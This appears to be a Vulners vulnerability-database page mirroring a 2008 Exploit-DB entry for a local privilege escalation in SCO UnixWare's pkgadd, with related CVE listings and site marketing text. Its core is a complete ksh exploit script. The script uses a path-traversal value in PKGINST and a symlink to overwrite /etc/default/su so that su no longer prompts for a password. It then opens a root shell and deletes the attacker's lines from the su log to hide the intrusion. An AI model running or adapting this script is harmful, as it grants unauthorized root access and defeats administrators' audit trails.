Lucene search
+L

SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalation

🗓️ 04 Apr 2008 00:00:00Reported by qaazType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

SCO UnixWare version < 7.1.4 p534589 'pkgadd' Local Privilege Escalation vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-0310
4 Apr 200800:00
circl
circl
Circl
CVE-2008-1343
4 Apr 200800:00
circl
cve
CVE
CVE-2008-0310
7 Apr 200817:00
cve
cve
CVE
CVE-2008-1343
17 Mar 200816:00
cve
cvelist
Cvelist
CVE-2008-0310
7 Apr 200817:00
cvelist
cvelist
Cvelist
CVE-2008-1343
17 Mar 200816:00
cvelist
euvd
EUVD
EUVD-2008-0320
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-1350
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-0310
7 Apr 200817:44
nvd
nvd
NVD
CVE-2008-1343
17 Mar 200816:44
nvd
Rows per page
#!/bin/ksh
#
# 04/2008: public release
# SCO UnixWare < 7.1.4 p534589
#
if [ `id -un` = 'root' ]; then
	grep -v " $1-root\$" /var/adm/sulog >su.log
	cp su.def /etc/default/su
	cp su.log /var/adm/sulog
	rm -f su.def su.log woot.log
else
	echo "------------------------------------"
	echo " UnixWare pkgadd Local Root Exploit"
	echo " By qaaz"
	echo "------------------------------------"
	EVIL=`echo 'XX\nPROMPT=No\nXX'`
	cp /etc/default/su su.def
	ln -s /etc/default/su woot.log
	PKGINST=../../../..`pwd`/woot /usr/sbin/pkgadd "$EVIL" 1>/dev/null 2>&1
	su root -c "$0 `id -un`; /bin/sh -i"
fi

# milw0rm.com [2008-04-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.9
EPSS0.01006
46